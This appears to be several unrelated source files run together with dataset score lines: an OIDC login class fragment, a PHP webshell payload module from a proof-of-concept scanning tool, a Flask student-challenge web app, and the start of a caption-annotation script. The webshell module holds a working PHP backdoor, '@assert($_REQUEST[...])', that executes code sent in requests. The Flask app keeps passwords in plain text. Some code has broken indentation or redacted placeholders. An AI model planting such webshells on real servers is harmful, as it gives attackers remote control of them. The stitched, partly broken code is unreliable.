                    logger.debug('No expiration date for signing keys')
                    self.jwks_expiration = None
    def handle_start(self, app, oidc_listener_service):
        """Startup hook: register with the redirect listener and run discovery."""
        # Register so the OIDC redirect listener can dispatch responses to us
        oidc_listener_service.register_service(self.ident, self)

        method, url, params, data = self.create_discovery_request()
        if url:
            # Populate issuer and endpoints from the provider discovery document
            r = self.send_request(method, url, params, data).json()
            self.issuer = r['issuer']
            self.endpoints = {endpoint: r.get(endpoint) for endpoint in self.ENDPOINTS}

            jwks_uri = r.get('jwks_uri')
            if jwks_uri and not self.jwks_uri:
                self.jwks_uri = jwks_uri
                # Force an immediate key fetch below
                self.jwks_expiration = time.time() - 1

        missing_endpoints = [endpoint for endpoint in self.REQUIRED_ENDPOINTS if not self.endpoints[endpoint]]
        if missing_endpoints:
            self.logger.error('Endpoints without values: ' + ', '.join(missing_endpoints))

        self.fetch_keys()
    def handle_request(self, chain, **params):
        # Refresh the provider signing keys if their cache expired,
        # then delegate to the cookie-based authentication handling.
        self.fetch_keys()
        return super(Authentication, self).handle_request(chain, **params)
    def validate_id_token(self, id_token):
        """Validate the ID token claims (issuer, audience, azp, expiry).

        Follows the ID token validation rules of OpenID Connect Core 1.0
        section 3.1.3.7; signature verification is done by the caller.
        """
        audiences = set(id_token['aud'].split())
        authorized_party = id_token.get('azp')

        return (
            # issuer must match the configured/discovered one, when known
            (not self.issuer or id_token['iss'] == self.issuer) and
            # this client must be one of the audiences
            (self.client_id in audiences) and
            # multiple audiences require an 'azp' claim
            ((len(audiences) == 1) or (authorized_party is not None)) and
            # when present, 'azp' must be this client
            ((authorized_party is None) or (self.client_id == authorized_party)) and
            # token must not be expired
            (id_token['exp'] > time.time())
        )
def refresh_token(self, refresh_token):
method, url, params, data = self.create_refresh_token_request(refresh_token)
return self.send_request(method, url, params, data)
    def is_auth_response(self, request):
        """Detect an authorization-code redirect from the provider.

        Returns ``(code, session_id, state_id, action_id)``; ``code`` is
        ``None`` when the request is not a valid auth response.
        """
        code, session_id, state_id, action_id = None, 0, 0, ''

        state = request.params.get('state', '')
        code = request.params.get('code')
        # Our generated 'state' has the form '#<ident>#<encrypted payload>'
        if code and state.startswith('#'):
            state = state.rsplit('#', 1)[1]
            try:
                state = self.decrypt(state.encode('ascii')).decode('ascii')
                session_id, state_id, action_id = state.split('#')
            except cookie_auth.InvalidToken:
                # Tampered or foreign state: treat as not an auth response
                code = None

        return code, int(session_id), int(state_id), action_id
    def to_cookie(self, **credentials):
        """Serialize the credentials (only the 'sub' claim) into a cookie."""
        credentials = self.filter_credentials(credentials, {'sub'})
        if self.encrypted:
            cookie = super(Authentication, self).to_cookie(credentials.pop('sub'), **credentials)
        else:
            # Unencrypted cookies are still integrity-protected (signed JWT)
            cookie = generate_jwt(credentials, self.jwk_key, 'HS256')

        return cookie
    def from_cookie(self, cookie, max_age):
        """Extract ``(principal, credentials)`` from an authentication cookie."""
        if self.encrypted:
            principal, credentials = super(Authentication, self).from_cookie(cookie, max_age)
            credentials['sub'] = principal
        else:
            # Verify the HS256 signature produced in `to_cookie`
            _, credentials = verify_jwt(cookie.decode('ascii'), self.jwk_key, ['HS256'], checks_optional=True)

        credentials = self.filter_credentials(credentials, {'sub'})
        return credentials['sub'], credentials
def retrieve_credentials(self, session):
if self.cookie or not session:
return None, {}
credentials = session.get('nagare.credentials', {})
return credentials.get('sub'), credentials
@staticmethod
def filter_credentials(credentials, to_keep):
return {k: v for k, v in credentials.items() if k in to_keep}
def store_credentials(self, session, credentials):
if not self.cookie and session:
session['nagare.credentials'] = self.filter_credentials(credentials, {'sub'})
def request_credentials(self, request, code, action_id):
    """Exchange an authorization ``code`` for tokens and validate the id_token.

    Returns the id_token claims augmented with ``access_token`` (and
    ``refresh_token`` when issued), or ``{}`` on any failure.  Errors are
    logged, never raised.
    """
    credentials = {}
    method, url, params, data = self.create_token_request(request.create_redirect_url(), code)
    response = self.send_request(method, url, params, data)
    if response.status_code == 400:
        # OAuth error response: prefer the structured JSON error if present.
        error = response.text
        if response.headers.get('content-type') == 'application/json':
            response = response.json()
            if 'error' in response:
                error = response['error']
                description = response.get('error_description')
                if description:
                    error += ': ' + description
        self.logger.error(error)
    elif response.status_code != 200:
        self.logger.error('Authentication error')
    else:
        tokens = response.json()
        id_token = tokens['id_token']
        try:
            # Pick the signing key announced in the JWT header ('kid'),
            # then verify the signature (skipped when not in secure mode).
            headers, _ = process_jwt(id_token)
            key = self.signing_keys.get_key(headers.get('kid'))
            _, id_token = verify_jwt(id_token, key, self.algorithms if self.secure else None, checks_optional=True)
        except (JWException, _JWTError) as e:
            self.logger.error('Invalid id_token: ' + e.args[0])
        else:
            if not self.validate_id_token(id_token):
                self.logger.error('Invalid id_token')
            else:
                credentials = dict(id_token, access_token=tokens['access_token'])
                refresh_token = tokens.get('refresh_token')
                if refresh_token is not None:
                    credentials['refresh_token'] = refresh_token
                if action_id:
                    # Replay the pending action once authentication succeeded.
                    request.environ['QUERY_STRING'] = action_id + '='
    return credentials
def get_principal(self, request, response, session, session_id, state_id, **params):
    """Resolve the current principal for this request.

    Resolution order: (1) an authorization callback carrying a fresh code,
    (2) credentials stored in the session, (3) the parent class mechanism
    (e.g. cookie).  Returns ``(sub, credentials, new_response)`` where
    ``new_response`` is a redirect after a successful code exchange.
    """
    new_response = None
    credentials = {}
    code, _, _, action_id = self.is_auth_response(request)
    if code:
        credentials = self.request_credentials(request, code, action_id)
        if credentials:
            # Redirect to strip the code/state from the URL (PRG pattern).
            new_response = request.create_redirect_response(
                response=response,
                _s=session_id,
                _c='%05d' % state_id
            )
    if not credentials:
        principal, credentials = self.retrieve_credentials(session)
        if not principal:
            principal, credentials, r = super(Authentication, self).get_principal(
                request=request, response=response,
                **params
            )
    if credentials:
        self.store_credentials(session, credentials)
    return credentials.get('sub'), credentials, new_response
def login(self, h, scopes=(), location=None):
    """Create a ``Login`` renderable that starts the authorization flow."""
    return Login(self, h, scopes, location)
def logout(self, location='', delete_session=True, user=None, access_token=None):
    """Disconnection of the current user.

    Mark the user object as expired and, when an ``access_token`` is given,
    also notify the provider's end-session endpoint.

    In:
      - ``location`` -- location to redirect to
      - ``delete_session`` -- is the session expired too?
      - ``user`` -- user object to expire (current user when ``None``)
      - ``access_token`` -- token to revoke at the provider, if any

    Returns ``True`` only when the local logout and the provider-side
    revocation (expected HTTP 204) both succeeded.
    """
    status = super(Authentication, self).logout(location, delete_session, user)
    if access_token is not None:
        method, url, params, data = self.create_end_session_request(access_token)
        if url:
            response = self.send_request(method, url, params, data)
            status = status and (response.status_code == 204)
    return status
def user_info(self, access_token):
    """Query the provider's userinfo endpoint; return ``{}`` on any failure."""
    method, url, params, data = self.create_userinfo_request(access_token)
    if not url:
        # Provider does not expose a userinfo endpoint.
        return {}
    response = self.send_request(method, url, params, data)
    if response.status_code != 200:
        return {}
    return response.json()
class AuthenticationWithDiscovery(Authentication):
    """OIDC authentication that locates endpoints via the discovery document."""
    CONFIG_SPEC = dict(
        Authentication.CONFIG_SPEC,
        discovery_endpoint='string(default="{base_url}/.well-known/openid-configuration")'
    )
# ---------------------------------------------------------------------------------------------------------------------
class KeycloakAuthentication(Authentication):
    """Authentication against a Keycloak realm (adds the ``realm`` setting)."""
    CONFIG_SPEC = dict(
        Authentication.CONFIG_SPEC,
        realm='string',
        discovery_endpoint='string(default="{base_url}/auth/realms/{realm}/.well-known/openid-configuration")'
    )
class GoogleAuthentication(AuthenticationWithDiscovery):
    """Authentication against Google's OIDC provider (accounts.google.com)."""
    CONFIG_SPEC = dict(
        AuthenticationWithDiscovery.CONFIG_SPEC,
        host='string(default="accounts.google.com")'
    )
class AzureAuthentication(Authentication):
    """Authentication against Azure AD (login.microsoftonline.com).

    NOTE(review): this class derives from ``Authentication`` yet builds its
    CONFIG_SPEC from ``AuthenticationWithDiscovery.CONFIG_SPEC`` and declares a
    ``discovery_endpoint``; confirm whether the intended base class is
    ``AuthenticationWithDiscovery``.
    """
    CONFIG_SPEC = dict(
        AuthenticationWithDiscovery.CONFIG_SPEC,
        host='string(default="login.microsoftonline.com")',
        discovery_endpoint='string(default="{base_url}/{tenant}/v2.0/.well-known/openid-configuration")',
        tenant='string(default="common")'
    )
| 2.078125 | 2 |
plugins/beebeeto/utils/payload/webshell/php.py | aliluyala/PocHunter | 95 | 12760300 | #author: fyth
from webshell import *
class PhpShell(Webshell):
    """PHP one-liner webshell payload used for proof-of-concept verification."""
    # NOTE(review): '<PASSWORD>' is a dataset redaction artifact; it is the
    # request parameter name substituted into ``_content`` via ``{0}``.
    _password = '<PASSWORD>'
    # Payload written to the target; it echoes md5(123) so success is detectable.
    _content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
    # Statement whose output proves code execution on the target.
    _check_statement = 'var_dump(md5(123));'
    # md5('123'); its presence in the HTTP response confirms execution.
    _keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
    """Self-deleting PHP verification payload: prints md5(123) then removes itself."""
    _content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
    # md5('123'); checked in the response to confirm execution.
    _keyword = '202cb962ac59075b964b07152d234b70'
| 1.835938 | 2 |
main.py | cwormsl2/TraditionsChallenge | 0 | 12760301 | <filename>main.py
'''
Authors: <NAME>, <NAME>, <NAME>
Final Project for Advanced Web Programming at Ithaca College
Fall 2015
Used the code from chapter 5a from the book "Flask Web Development: Developing Web Applications
by <NAME> as a base for this project
'''
import os
from flask import Flask, request, render_template, redirect, url_for, flash, send_from_directory, session
from flask.ext.script import Manager
from flask.ext.bootstrap import Bootstrap
from flask.ext.moment import Moment
from flask.ext.sqlalchemy import SQLAlchemy
from werkzeug import secure_filename
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_login import LoginManager, login_required
from flask.ext.wtf import Form
from wtforms import StringField, PasswordField, BooleanField, SubmitField, SelectField, validators, TextField
from wtforms.validators import Required
#from app.main.forms import RegistrationForm
import app.main.forms
# Application/extension wiring for the TraditionsChallenge Flask app.
basedir = os.path.abspath(os.path.dirname(__file__))
# Uploaded challenge photos live under static/ so templates can serve them.
UPLOAD_FOLDER = os.path.join(basedir, 'static/pics')
ALLOWED_EXTENSIONS = set(['png', 'jpg'])
app = Flask(__name__)
# NOTE(review): hard-coded secret key; move to environment config before deploy.
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] = \
    'sqlite:///' + os.path.join(basedir, 'TraditionsChallenge.sqlite')
# Sessions auto-commit on request teardown, so routes may mutate rows freely.
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
manager = Manager(app)
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
admin = Admin(app)
class User(db.Model):
    """Application user account (students and admins).

    ``private`` controls photo visibility (2 = public), ``numComplete`` counts
    approved challenge completions.
    """
    __tablename__ = 'User'
    id = db.Column(db.Integer, primary_key=True)
    role = db.Column(db.String(64))  # 'Student' or 'Admin'
    username = db.Column(db.String(64), unique=True, index=True)
    password = db.Column(db.String(64), index=True)
    firstName = db.Column(db.String(64), index=True)
    lastName = db.Column(db.String(64), index=True)
    classYear = db.Column(db.Integer)
    major = db.Column(db.String(64), index=True)
    email = db.Column(db.String(64), unique=True, index=True)
    idNumber = db.Column(db.Integer, unique=True)
    private = db.Column(db.Integer)
    numComplete = db.Column(db.Integer)

    def check_password(self, password):
        """Return True when ``password`` matches the stored one.

        NOTE(review): passwords are stored and compared in plain text;
        hash them (e.g. werkzeug.security) before production use.
        """
        return password == self.password

    def is_authenticated(self):
        """Flask-Login hook: database-backed accounts are always authenticated."""
        return True
class Challenge(db.Model):
    """One tradition challenge that students can complete."""
    __tablename__ = 'Challenge'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(128), unique=True, index=True)
class UserToChallenge(db.Model):
    """A user's photo submission for one challenge.

    ``status``: 0 = pending review, 1 = approved, 2 = denied (see adminHome).
    """
    __tablename__ = 'UserToChallenge'
    id = db.Column(db.Integer, primary_key=True)
    status = db.Column(db.Integer)
    #changed below line to db.String
    photo = db.Column(db.String)  # stored filename under UPLOAD_FOLDER
    description = db.Column(db.String(128), index=True)
    userid = db.Column(db.Integer, db.ForeignKey('User.id'))
    challengeid = db.Column(db.Integer, db.ForeignKey('Challenge.id'))
class Prize(db.Model):
    """A reward unlocked after completing a number of challenges."""
    __tablename__ = 'Prize'
    id = db.Column(db.Integer, primary_key=True)
    prizeName = db.Column(db.String(64), unique=True, index=True)
    numChallengesNeeded = db.Column(db.Integer)
class UserToPrize(db.Model):
    """Association between a user and a prize they earned/claimed."""
    __tablename__ = 'UserToPrize'
    id = db.Column(db.Integer, primary_key=True)
    status = db.Column(db.Integer)
    userid = db.Column(db.Integer, db.ForeignKey('User.id'))
    prizeid = db.Column(db.Integer, db.ForeignKey('Prize.id'))
@app.errorhandler(404)
def page_not_found(error):
    """Render the custom 404 page for unknown URLs."""
    print(error)
    return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(error):
    """Render the custom 500 page on unhandled server errors."""
    return render_template('500.html'), 500
@app.route('/', methods=['GET', 'POST'])
def ictraditions():
    """Landing page: lists every tradition challenge by id order."""
    challenge_names = [challenge.name for challenge in Challenge.query.order_by('id')]
    return render_template('ictraditions.html', challengeList=challenge_names)
def checkForLogin():
    """True when the current session belongs to a logged-in student."""
    # ``get`` yields None for an absent key, which compares unequal to True.
    return session.get('isLoggedIn') == True
def checkForAdminLogin():
    """True when the current session belongs to a logged-in admin."""
    return session.get('isAdminLoggedIn') == True
@app.route('/home.html', methods=['GET', 'POST'])
#@login_required
def home():
    """Student dashboard: shows challenge statuses and accepts photo uploads.

    POST handles a photo submission for one challenge; the file is renamed to
    ``<username><challengeid>.<ext>`` and stored as a pending (status 0) entry.
    """
    challengeList = []
    user1 = User.query.filter_by(id=session['user_id']).first()
    numComplete = user1.numComplete
    for a in Challenge.query.order_by('id'):
        challengeList.append(a.name)
    if request.method == 'POST':
        file = request.files['file']
        ##########
        desc = request.form['description']
        challenge = request.form['challenge']
        if file and allowed_file(file.filename):
            filename = file.filename
            #this changes the filename to the username followed by the challenge number
            type = filename[-4:]  # NOTE(review): assumes a 3-letter extension
            currentUserId = session['user_id']
            currUser = User.query.filter_by(id = currentUserId).first()
            newName = currUser.username + str(challenge) + type
            file.save(os.path.join(app.config['UPLOAD_FOLDER'], newName))
            userToChallenge = UserToChallenge(status = 0,
                                              photo = newName,
                                              description = desc,
                                              userid = currentUserId,
                                              challengeid = challenge)
            db.session.add(userToChallenge)
            db.session.commit()
            flash('Your photo has been uploaded successfully.')
            #return redirect(url_for('uploaded_file',filename=filename))
        else:
            flash('Not a valid file type. Only jpg and png allowed.')
    # -1 = never submitted; otherwise the latest UserToChallenge status.
    statusList=[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]
    for a in UserToChallenge.query.filter_by(userid = session['user_id']):
        statusList[a.challengeid-1]=a.status
    isIn=checkForLogin()
    return render_template('home.html', challengeList = challengeList, isLoggedIn=isIn, numComplete=numComplete, statusList=statusList)
@app.route('/register.html', methods=['GET', 'POST'])
def register():
    """Create a new student account from the registration form."""
    from app.main.forms import RegistrationForm
    form = RegistrationForm()
    if form.validate_on_submit():
        user = User(role='Student',
                    email=form.email.data,
                    username=form.username.data,
                    # NOTE(review): '<PASSWORD>' is a dataset redaction
                    # artifact; the original presumably read form.password.data.
                    password=<PASSWORD>,
                    idNumber=form.idNumber.data,
                    private=form.private.data,
                    firstName = form.firstName.data,
                    lastName = form.lastName.data,
                    classYear = form.classYear.data,
                    major = form.major.data,
                    numComplete = 0)
        db.session.add(user)
        db.session.commit()
        flash('Your account has been created. You may now login!')
        challengeList=[]
        for a in Challenge.query.order_by('id'):
            challengeList.append(a.name)
        return render_template('ictraditions.html', challengeList=challengeList)
    return render_template('register.html', form=form)
@app.route('/community.html', methods=['GET', 'POST'])
def community():
    """Community photo grid of all public users' submissions.

    GET shows every photo of users with ``private == 2``.  POST handles three
    buttons: "Clear Search" (re-show everything), "Submit" (filter by
    challenge), and username search (default branch).

    NOTE(review): ``loggedIn`` is only assigned when someone is logged in; an
    anonymous visitor would hit a NameError at the first render call — confirm
    whether this page is reachable without login.
    """
    challengeList=[]
    for a in Challenge.query.order_by('id'):
        challengeList.append(a.name)
    #PICTURE GRID
    isIn=checkForLogin()
    isAdminIn = checkForAdminLogin()
    print("isIn")
    print(isIn)
    print("isAdminIn")
    print(isAdminIn)
    if isIn or isAdminIn:
        loggedIn = True
    userList = []
    userNameList = []
    photoList = []
    descriptionList = []
    tempList = []
    tempUserList = []
    tempChallList = []
    challengePicList = []
    #queries the databse for all users who allow pics to be public
    for a in User.query.filter_by(private = 2):
        userList.append(a.id)
    #queries database for all userids
    for a in UserToChallenge.query.order_by('userid'):
        #if a UserToChallenge entry has a public user then append the photo, description to approproate lists
        if a.userid in userList:
            photoList.append(a.photo)
            descriptionList.append(a.description)
            tempUserList.append(a.userid)
            tempChallList.append(a.challengeid)
    for b in tempUserList:
        for c in User.query.filter_by(id=b):
            userNameList.append(c.username)
    for d in tempChallList:
        for e in Challenge.query.filter_by(id=d):
            challengePicList.append(e.name)
    #photoList, descriptionList, userNameList, challengePicList = getAllPhotos()
    print(userNameList)
    print(challengePicList)
    photoListSearch = []
    descriptionListSearch = []
    userNameListSearch = []
    challengePicListSearch=[]
    if request.method == 'POST':
        buttonType = request.form['submit']
        userToSearchBy = request.form['text']
        challenge = request.form['challenge']
        if buttonType == "Clear Search":
            # Rebuild the unfiltered grid (duplicates the GET path above).
            photoList = []
            descriptionList = []
            #photoList, descriptionList, userNameList, challengePicList = getAllPhotos()
            for a in User.query.filter_by(private = 2):
                userList.append(a.id)
                #userNameList.append(a.username)
            for a in UserToChallenge.query.order_by('userid'):
                if a.userid in userList:
                    photoList.append(a.photo)
                    descriptionList.append(a.description)
                    tempList.append(a.userid)
            for b in tempList:
                for c in User.query.filter_by(id=b):
                    userNameList.append(c.username)
            return render_template('community.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn, userNameList=userNameList, photoList=photoList, descriptionList=descriptionList, challengeList=challengeList, challengePicList=challengePicList)
        elif buttonType =="Submit":
            photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch = searchByChallenge(challenge)
            if (photoListSearch == []):
                flash("No public images for this challenge")
            return render_template('community.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn, userNameList=userNameListSearch, photoList=photoListSearch, descriptionList=descriptionListSearch, challengeList=challengeList, challengePicList=challengePicListSearch)
        else:
            photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch = searchByName(userToSearchBy)
            if (photoListSearch == []):
                flash("No public images for this user")
            return render_template('community.html', isLoggedIn=loggedIn,isAdminLoggedIn=isAdminIn, userNameList=userNameListSearch, photoList=photoListSearch, descriptionList=descriptionListSearch, challengeList=challengeList, challengePicList=challengePicListSearch)
    return render_template('community.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn, userNameList=userNameList, photoList=photoList, descriptionList=descriptionList, challengeList=challengeList, challengePicList=challengePicList)
def searchByName(searchTerm):
    """Collect the public photos belonging to the user named ``searchTerm``.

    Returns four parallel lists (photos, descriptions, usernames,
    challenge names) in matching order; all empty when the user is not
    found or not public (``private != 2``).
    """
    public_user_ids = [
        user.id
        for user in User.query.filter_by(username=searchTerm)
        if user.private == 2
    ]
    photos, descriptions = [], []
    owner_ids, challenge_ids = [], []
    for entry in UserToChallenge.query.order_by('userid'):
        if entry.userid in public_user_ids:
            photos.append(entry.photo)
            descriptions.append(entry.description)
            owner_ids.append(entry.userid)
            challenge_ids.append(entry.challengeid)
    usernames = [
        owner.username
        for owner_id in owner_ids
        for owner in User.query.filter_by(id=owner_id)
    ]
    challenge_names = [
        challenge.name
        for challenge_id in challenge_ids
        for challenge in Challenge.query.filter_by(id=challenge_id)
    ]
    return photos, descriptions, usernames, challenge_names
def searchByChallenge(searchTerm):
    """Collect public photos submitted for the challenge id ``searchTerm``.

    Returns four parallel lists (photos, descriptions, usernames,
    challenge names) in matching order.
    """
    print(searchTerm)
    userListSearch = []
    photoListSearch = []
    descriptionListSearch = []
    userNameListSearch = []
    tempUserList=[]
    tempChallList=[]
    challengePicListSearch=[]
    # Only photos of users who opted into public visibility.
    for a in User.query.filter_by(private = 2):
        userListSearch.append(a.id)
    for a in UserToChallenge.query.filter_by(challengeid = searchTerm):
        if a.userid in userListSearch:
            photoListSearch.append(a.photo)
            descriptionListSearch.append(a.description)
            tempUserList.append(a.userid)
            tempChallList.append(a.challengeid)
    # Resolve ids to display names, preserving order.
    for b in tempUserList:
        for c in User.query.filter_by(id=b):
            userNameListSearch.append(c.username)
    for d in tempChallList:
        for e in Challenge.query.filter_by(id=d):
            challengePicListSearch.append(e.name)
    print('test')
    print(tempChallList)
    print(challengePicListSearch)
    return (photoListSearch, descriptionListSearch, userNameListSearch, challengePicListSearch)
@app.route('/calendar.html', methods=['GET', 'POST'])
def calendar():
    """Render the events calendar.

    Bug fix: ``loggedIn`` was only assigned when a student or admin was
    logged in, so an anonymous visitor triggered an error at render time;
    it now simply defaults to False.
    """
    isIn = checkForLogin()
    isAdminIn = checkForAdminLogin()
    loggedIn = isIn or isAdminIn
    return render_template('calendar.html', isLoggedIn=loggedIn, isAdminLoggedIn=isAdminIn)
class ChangePrivacyForm(Form):
    """Settings form toggling a user's photo visibility (1=Private, 2=Public)."""
    newPrivate = SelectField('Would you like to change the privacy setting of your photos?', validators=[Required()],
                             coerce=int, choices=[(1, "Private"), (2, "Public")])
    submit = SubmitField('Update')
@app.route('/settings.html', methods=['GET', 'POST'])
def settings():
    """Account settings page: update the photo privacy flag.

    The row mutation is persisted by SQLALCHEMY_COMMIT_ON_TEARDOWN (no
    explicit commit here).
    """
    form = ChangePrivacyForm()
    if form.validate_on_submit():
        currentUserId = session['user_id']
        for a in User.query.filter_by(id = currentUserId):
            a.private = form.newPrivate.data
        flash('Your privacy settings have been updated.')
        isIn=checkForLogin()
        # Post/Redirect/Get to avoid re-submitting on refresh.
        return redirect(url_for('settings'))
        #return redirect('settings.html',isLoggedIn=isIn, form=form)
    isIn=checkForLogin()
    return render_template('settings.html', isLoggedIn=isIn, form=form)
@app.route('/prizeReview.html', methods=['GET', 'POST'])
def prizeReview():
    """Admin page listing the users who qualify for each prize tier (5/10/15)."""
    prize1List = _usernames_with_completions(5)
    prize2List = _usernames_with_completions(10)
    prize3List = _usernames_with_completions(15)
    isAdminIn = checkForAdminLogin()
    return render_template('prizeReview.html', prize1List=prize1List, prize2List=prize2List, prize3List=prize3List, isAdminLoggedIn=isAdminIn)


def _usernames_with_completions(minimum):
    """Usernames of users with at least ``minimum`` completed challenges.

    ``order_by('role')`` is kept from the original for a stable listing order.
    """
    return [user.username for user in User.query.order_by('role') if minimum <= user.numComplete]
def allowed_file(filename):
    """True when ``filename`` carries an allowed image extension.

    The comparison is now case-insensitive so uploads like ``photo.JPG``
    are accepted alongside ``photo.jpg`` (ALLOWED_EXTENSIONS is lowercase).
    """
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/uploads/<filename>')
def uploaded_file(filename):
    """Serve a previously uploaded challenge photo from the upload folder."""
    return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
#LOGIN
class LoginForm(Form):
    """Username/password login form; on success ``self.user`` holds the account."""
    username = TextField('Username', [validators.Required()])
    password = PasswordField('Password', [validators.Required()])
    submit = SubmitField('Login')

    def __init__(self, *args, **kwargs):
        Form.__init__(self, *args, **kwargs)
        self.user = None  # populated by validate() on success

    def validate(self):
        """Field validation plus credential check against the User table."""
        rv = Form.validate(self)
        if not rv:
            return False
        user = User.query.filter_by(username=self.username.data).first()
        if user is None:
            self.username.errors.append('Unknown username')
            return False
        if not user.check_password(self.password.data):
            self.password.errors.append('Invalid password')
            return False
        self.user = user
        return True
login_manager = LoginManager()
login_manager.init_app(app)


@login_manager.user_loader
def load_user(id):
    """Flask-Login user loader: resolve a session user id to a User row.

    Bug fix: the previous version returned the ``User.id`` Column object
    instead of looking the account up in the database.
    """
    return User.query.get(int(id))
@app.route('/login.html', methods=['GET', 'POST'])
def login():
    """Authenticate a user and route them to the student or admin dashboard."""
    # Reset both flags so a failed attempt never leaves a stale login.
    session['isLoggedIn'] = False
    session['isAdminLoggedIn'] = False
    form = LoginForm()
    if form.validate_on_submit():
        session['user_id'] = form.user.id
        for a in User.query.filter_by(username=form.user.username):
            if a.role == 'Student':
                session['isLoggedIn'] = True
                return redirect(url_for('home'))
            if a.role == 'Admin':
                session['isAdminLoggedIn'] = True
                return redirect(url_for('adminHome'))
    return render_template('login.html', form=form)
@app.route('/logout.html')
def logout():
    """Clear the login flags and show the landing page.

    NOTE(review): ``session['user_id']`` is left in place and the landing
    template is rendered without its ``challengeList`` argument.
    """
    session['isLoggedIn'] = False
    session['isAdminLoggedIn'] = False
    return render_template('ictraditions.html')
#ADMIN
# Expose every model through the Flask-Admin CRUD interface.
admin.add_view(ModelView(User, db.session))
admin.add_view(ModelView(Challenge, db.session))
admin.add_view(ModelView(UserToChallenge, db.session))
admin.add_view(ModelView(Prize, db.session))
admin.add_view(ModelView(UserToPrize, db.session))
@app.route('/admin/index')
def admin():
    """Render the Flask-Admin index template.

    NOTE(review): this function name rebinds the module-level ``admin``
    (the Flask-Admin instance created above) — consider renaming the view.
    """
    return render_template('admin/index.html')
@app.route('/adminHome.html', methods=['GET', 'POST'])
def adminHome():
    """Admin review queue: approve or deny pending (status 0) submissions.

    POST button values look like ``"Approve: <photo>"`` / ``"Deny: <photo>"``;
    approval sets status 1 and increments the owner's ``numComplete``,
    denial sets status 2.  The parallel lists are pruned so the rendered
    queue no longer shows the handled photo.
    """
    isAdminIn = checkForAdminLogin()
    #photoList will be the photos that are pending that the admin needs to approve
    photoList = []
    descriptionList=[]
    challengeNameList=[]
    userNameList=[]
    for a in UserToChallenge.query.order_by('status'):
        if a.status == 0:
            photoList.append(a.photo)
            descriptionList.append(a.description)
            userNameList.append(User.query.filter_by(id=a.userid).first().username)
            challengeNameList.append(Challenge.query.filter_by(id=a.challengeid).first().name)
    if request.method == 'POST':
        if request.form['submit']:
            buttonString = request.form['submit']
            approveOrDeny = buttonString.split(":")[0]
            if(approveOrDeny == "Approve"):
                # Button text encodes the photo name after the first space.
                photoName = buttonString.split(" ")[1]
                for a in UserToChallenge.query.filter_by(photo=photoName):
                    if a.photo == photoName:
                        a.status = 1
                        for b in User.query.filter_by(id = a.userid):
                            b.numComplete = b.numComplete +1
                        db.session.commit()
                        index = photoList.index(a.photo)
                        photoList.remove(a.photo)
                        userNameList.remove(userNameList[index])
                        descriptionList.remove(descriptionList[index])
                        challengeNameList.remove(challengeNameList[index])
                return render_template('adminHome.html', isAdminLoggedIn=isAdminIn, photoList = photoList, userNameList=userNameList, challengeNameList=challengeNameList, descriptionList=descriptionList)
            elif(approveOrDeny == "Deny"):
                photoLong = request.form['submit']
                photoName = photoLong.split(" ")[1]
                for a in UserToChallenge.query.filter_by(photo=photoName):
                    if a.photo == photoName:
                        a.status = 2
                        db.session.commit()
                        index = photoList.index(a.photo)
                        print(descriptionList)
                        photoList.remove(a.photo)
                        userNameList.remove(userNameList[index])
                        descriptionList.remove(descriptionList[index])
                        challengeNameList.remove(challengeNameList[index])
                        print(descriptionList)
                return render_template('adminHome.html', isAdminLoggedIn=isAdminIn, photoList = photoList, userNameList=userNameList, challengeNameList=challengeNameList, descriptionList=descriptionList)
            else:
                print("error")
    return render_template('adminHome.html', isAdminLoggedIn=isAdminIn, photoList = photoList, userNameList=userNameList, challengeNameList=challengeNameList, descriptionList=descriptionList)
if __name__ == '__main__':
    # Create any missing tables, then hand control to Flask-Script's manager.
    db.create_all()
    manager.run()
| 2.46875 | 2 |
prepro/create_json_file.py | giangnguyen2412/dissect_catastrophic_forgetting | 2 | 12760302 | <filename>prepro/create_json_file.py
import os
import json
import argparse
from pick_image import make_dir
def create_class_annotations(test_dir, json_file, output_dir, class_name):
    """
    Create annotation files for each class in test set, set is created from val
    so image name will be like in validation set
    :param test_dir:
    :param json_file:
    :param output_dir: NOTE(review): immediately overwritten below — the
        output is always written next to the class images, not here.
    :param class_name: category name e.g dog, cat ...
    :return:
    """
    input_img_path = test_dir + class_name + '/'
    input_json_file = json_file
    output_dir = input_img_path
    output_path = output_dir + 'captions_test.json'
    # os.walk yields (dirpath, dirnames, filenames); only [0] (the top
    # directory's file list) is consulted below.
    image_subdirs = [x[2] for x in os.walk(input_img_path)]
    with open(input_json_file) as json_file:
        data = json.load(json_file)
    class_json = dict()
    class_json['info'] = data['info']
    class_json['licenses'] = data['licenses']
    class_json['images'] = []
    class_json['annotations'] = []
    class_json['type'] = 'captions' # Add this to adapt with coco-eval
    # Keep only the images (and their captions) present in the class folder.
    for image in data['images']:
        if image['file_name'] in image_subdirs[0]:
            class_json['images'].append(image)
    for annotation in data['annotations']:
        image_id = annotation['image_id']
        file_name = ('COCO_%s2014_%012d.jpg' % ('val', image_id))
        if file_name in image_subdirs[0]:
            class_json['annotations'].append(annotation)
    print("Finishing build JSON object to dump to {}".format(output_path))
    with open(output_path, 'w') as file:
        json.dump(class_json, file)
def create_annotations(image_dir, json_file, output_dir, t_type, name):
    """
    Create annotation for a task
    :param image_dir: root of the per-task image folders
    :param json_file: directory holding the COCO caption JSON files
    :param output_dir: directory where captions_<t_type>.json is written
    :param t_type: split name: 'train', 'val' or 'test'
    :param name: task/folder name (e.g. 'base20')
    :return:
    """
